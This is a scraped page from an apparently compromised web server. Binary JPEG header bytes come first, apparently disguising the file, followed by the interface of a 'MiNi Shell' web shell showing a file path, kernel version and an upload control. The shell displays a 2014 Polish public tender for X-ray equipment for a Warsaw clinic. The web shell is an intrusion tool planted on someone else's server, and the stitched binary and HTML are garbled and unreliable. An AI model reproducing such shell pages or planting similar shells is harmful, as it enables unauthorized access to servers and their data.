JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140404/114914-N-2014.html

<p class="kh_header"><b>Warszawa: Dostawa do Przychodni Lekarskiej WAT SP ZOZ:                
1. Zestawu do ucyfrowienia aparatu RTG w Poradni Radiologicznej;
2. Aparatu RTG  z zestawem do radiografii cyfrowej dla Stomatologii; 
 (2 odrębne zadania)</b><br>
<b>Numer ogłoszenia: 114914 - 2014; data zamieszczenia: 04.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przychodnia Lekarska Wojskowej Akademii Technicznej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kartezjusza 2, 01-480 Warszawa, woj. mazowieckie, tel. 022 6838281, 6838283, faks 022 6838224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plwat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa do Przychodni Lekarskiej WAT SP ZOZ:                
1. Zestawu do ucyfrowienia aparatu RTG w Poradni Radiologicznej;
2. Aparatu RTG  z zestawem do radiografii cyfrowej dla Stomatologii; 
 (2 odrębne zadania).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: dostawa do Przychodni Lekarskiej WAT SP ZOZ:                
1)	Zestawu do ucyfrowienia aparatu RTG Optima Millenium (prod. Sedecal 2005 r.) w Poradni Radiologicznej (systemu do pośredniej radiografii cyfrowej);
2)	Aparatu RTG  z zestawem do radiografii cyfrowej dla Stomatologii;
    (2 odrębne zadania).  
2.	Specyfikacja techniczna zamawianych zestawów podana jest w Zał. Nr 1 dla zadania 1 oraz w Zał. Nr 2 dla zadania 2.
3.	Oferowany sprzęt oraz oprogramowanie muszą być zgodne z opisem przedstawionym w formularzach specyfikacji technicznych (Zał. Nr 1 i /lub Zał. Nr 2). Jeżeli w ofercie zostanie przedstawiony sprzęt lub zestaw niespełniający wymagań tam określonych oferta zostanie odrzucona, ponieważ jej treść nie będzie odpowiadać treści specyfikacji istotnych warunków zamówienia. Parametry opisane w wymienionych załącznikach należy traktować jako minimalne. Oznacza to, że Wykonawca może zawsze zaoferować sprzęt lub zestaw o parametrach lepszych (przewyższających opisane parametry przez Zamawiającego). 
4.	Oferowane zestawy muszą być fabrycznie nowe, rok produkcji 2014 (nie pochodzące  z wystawy i pokazów), kompletne, z zapewnieniem, aby do ich uruchomienia oraz stosowania zgodnie z przeznaczeniem nie były konieczne zakupy dodatkowych elementów i akcesoriów (poza materiałami eksploatacyjnymi).
5.	Oferowane zestawy muszą  posiadać dokumenty w języku polskim, potwierdzające dopuszczenie do obrotu i stosowania zgodnie z zasadami określonymi w Zał. I -wymagania w zakresie ochrony zdrowia i bezpieczeństwa odnoszące się do projektowania i wykonywania maszyn: Dyrektywa w sprawie maszyn 2006/42/WE oraz w Zał. II - Deklaracja zgodności CE (całkowite zapewnienie jakości) do Dyrektywy 93/42 EWG dotyczącej wyrobów medycznych  oraz ustawą o wyrobach medycznych. 
6.	Zamówienie obejmuje: 
1)	Dostawę zestawu/ zestawów do siedziby Zamawiającego;
2)	Ścisłą współpracę z Zamawiającym na etapie wykonywania prac przygotowawczych do uruchomienia zestawu/zestawów;
3)	   Montaż, instalację i uruchomienie wszystkich dostarczonych urządzeń wraz z oprogramowaniem w Pracowni Radiologicznej i gabinetach lekarskich w budynku Przychodni Lekarskiej WAT SP ZOZ; 
4)	Przygotowanie stanowisk komputerowych, instalacja i konfiguracja bazy danych, modułów programowych, konfigurację systemu;
5)	W zakresie zadania 2 wykonanie testów odbiorczych (akceptacyjnych) dla aparatu RTG stomatologicznego, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 18 lutego 2011r. w sprawie warunków bezpiecznego stosowania promieniowania jonizującego dla wszystkich rodzajów ekspozycji medycznej (Dz. U. 2011, Nr 51 poz. 265 z póź. zm.);
6)	Dostarczenie niezbędnej dokumentacji technicznej, serwisowej, kart gwarancyjnych; dokumentów dopuszczających do obrotu i stosowania, oraz dokumentów potwierdzających autoryzację Wykonawcy na terenie Polski w zakresie sprzedaży, serwisu gwarancyjnego i pogwarancyjnego;  
7)	Przeprowadzenie u Zamawiającego w uzgodnionych terminach szkolenia dla wyznaczonych pracowników medycznych i administratorów systemu w zakresie użytkowania i eksploatacji dostarczonego sprzętu i oprogramowania;
8)	Serwis gwarancyjny i pogwarancyjny dostarczonego sprzętu w terminach ustalonych w warunkach umowy oraz nadzór autorski i inżynierski oprogramowania.
7.	Oferty wg wzorów, stanowiących Zał. Nr 3.1 i Nr 3.2, można składać zarówno na  całość przedmiotu zamówienia, obejmującego 2 zadania, (które dalej nie są podzielne) wraz z usługami instalacji i przeszkolenia personelu oraz istnieje możliwość złożenia oferty częściowej na jedno wybrane zadanie.
8.	Zamawiający zaprasza, po uprzednio telefonicznie uzgodnionym terminie na spotkanie informacyjne Wykonawców zainteresowanych udziałem w przetargu w dniach 07-09. 04.2014 r. w godzinach 08:00-13:00, w siedzibie Zamawiającego - Przychodnia Lekarska WAT SP ZOZ ul. Kartezjusza 2, 01-480 Warszawa, w pok. Nr 116; tel. (22) 683-82-22 w celu udzielenia ew. informacji niezbędnych do przygotowania oferty oraz należytej realizacji zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Ewentualne zamówienia uzupełniające będą stanowiły nie więcej niż 20% wartości zamówienia podstawowego dla każdego zadania i będą dotyczyły dostawy dodatkowego sprzętu lub oprogramowania, kompatybilnych z zakupionymi zestawami.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.11.10.00-1, 33.11.15.00-6, 33.11.13.00-4, 33.11.16.00-7, 38.58.20.00-8, 30.23.60.00-2, 51.41.10.00-6, 48.18.00.00-3, 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium: dla zadania 1 w wysokości  5 500,00 zł; da zadania 2  w wysokości 900,00zł.
2.Brak potwierdzenia wniesienia wadium, będzie skutkował wykluczeniem Wykonawcy.
3.Wadium wnosi się przed upływem terminu składania ofert.
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu; 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
5.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego tj. : PKO SA 35 1240 2034 1111 0000 0307 9487
6.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.Wadium uważa się za wniesione skutecznie wówczas, gdy przed upływem terminu do złożenia ofert nastąpi uznanie na rachunku Zamawiającego, a dowód wniesienia wadium zostanie włożony do koperty z ofertą i dokumentami. 
8.Wadium wnoszone w formie innej, niż pieniężna musi spełniać następujące wymagania: musi odpowiadać co do wartości wysokości wadium określonej w specyfikacji; musi odpowiadać co do terminu ważności, terminowi związania ofertą określonemu w specyfikacji;musi zawierać w swojej treści wszystkie wymagane ustawą Prawo Zamówień Publicznych okoliczności, o których mowa zarówno w art. 46 ust. 4a, jak i w art. 46 ust. 5 ustawy Pzp, w których gwarant, poręczyciel wypłaci kwotę wadium, Zamawiającemu wraz z klauzulą stwierdzającą, że wypłata nastąpi na pierwsze żądanie Zamawiającego, bez protestu gwaranta;  musi  być podpisane przez osoby upoważnione do reprezentacji gwaranta, poręczyciela;
do oferty należy dołączyć dowód wniesienia wadium w formie innej niż pieniężna w formie oryginału w kopercie z ofertą i dokumentami.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga sporządzenia wykazu, głównych dostaw porównywalnych z przedmiotowym zamówieniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dowodów, czy zostały wykonane należycie. Zamawiający wymaga podania na druku Zał. Nr 6 wykazu co najmniej 2 odbiorców dostaw zgodnych z przedmiotem oraz wartością zamówienia w zakresie zadania dla składanej oferty w okresu ostatnich 3 lat wraz z min. 2 załączonymi referencjami. Dowody należytego wykonania dostaw czyli referencje, poświadczenia powinny być złożone w formie oryginału lub kserokopii, poświadczonej za zgodność z oryginałem przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga złożenia opłaconej polisy OC, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, z sumą gwarancyjną: dla zadania 1 nie mniejszą niż 200 000 zł, dla zadania 2 nie mniejszą niż 30 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wpis;zgłoszenie do Rejestru  Wyrobów Medycznych, dla każdego elementu zestawu, którego dotyczy, 
2. Aktualna Deklaracja zgodności CE potwierdzająca oznakowanie dokładnie oznaczonego produktu medycznego, będącego przedmiotem dostawy-znakiem zgodności CE; Certyfikaty CE; dla każdego elementu zestawu, którego dotyczy; 
3. Dokumenty producenta zestawu/zestawów potwierdzające autoryzację Wykonawcy na terenie Polski w zakresie sprzedaży; 
4. W zakresie serwisu gwarancyjnego i pogwarancyjnego, Wykonawca zobowiązany jest podać dane i adres uprawnionego/nych podmiotów, wykonujących usługi serwisowe w imieniu producenta autoryzowanego przedstawiciela czy importera w Warszawie lub jej okolicach do 50 km; 
5. Dokumentacja techniczna lub materiały informacyjne, zawierające pełne dane techniczne i parametry użytkowe, potwierdzające spełnienie wymagań Zamawiającego odnośnie parametrów granicznych; 
6. Inne wymagane dokumenty, które muszą być dostarczone po zainstalowaniu i uruchomieniu zestawu to: 
Instrukcje użytkowania w języku polskim;instrukcje obsługi, instrukcje serwisowe,w formie pisemnej i elektronicznej, do wszystkich urządzeń, stanowisk i programowania, 
wszelkie  wymagane dokumenty licencyjne,
karty gwarancyjne na elementy zestawu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W celu należytego wykonania przedmiotu umowy	Strony przewidują możliwość zmiany jej postanowień w stosunku do treści oferty Wykonawcy, w tym zmianę: ostatecznego terminu wykonania przedmiotu umowy, zasad wypłaty wynagrodzenia, wysokości wynagrodzenia, sposobu odbioru towaru, o ile zostanie spełniony jeden z następujących warunków: 
1. W sytuacji zaistnienia siły wyższej; 
2.Gdy konieczność zmiany jest spowodowana zaistnieniem niezawinionych przez Wykonawcę lub Zamawiającego okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłowe wykonanie przedmiotu umowy w terminie określonym w § 3 ust. 1 niniejszej umowy; 
3. Zmian lub wprowadzenia nowych przepisów prawa po zawarciu umowy, lub wprowadzenia nowej bezwzględnie obowiązującej normy powodującej konieczność zmiany, modyfikacji lub odstępstwa w odniesieniu do przedmiotu zamówienia; 
4.Zmiana ustawowej stawki podatku VAT lub innych obiektywnych obciążeń podatkowych; 
3.Wystąpienie którejkolwiek z wymienionych w  ust. 2, okoliczności nie stanowi bezwzględnego zobowiązania do dokonania takich zmian, ani nie stanowi podstawy roszczeń Wykonawcy do ich dokonania. 
4.Niezależnie od zapisów ust. 2, ceny jednostkowe określone w załączniku do oferty Wykonawcy, nie mogą ulec zmianie na niekorzyść Zamawiającego przez okres obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plwat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przychodnia Lekarska Wojskowej Akademii Technicznej SP ZOZ, 01-480, ul. Kartezjusza 2, Warszawa, Sekcja Zam. Publ. pok. 411.</p>
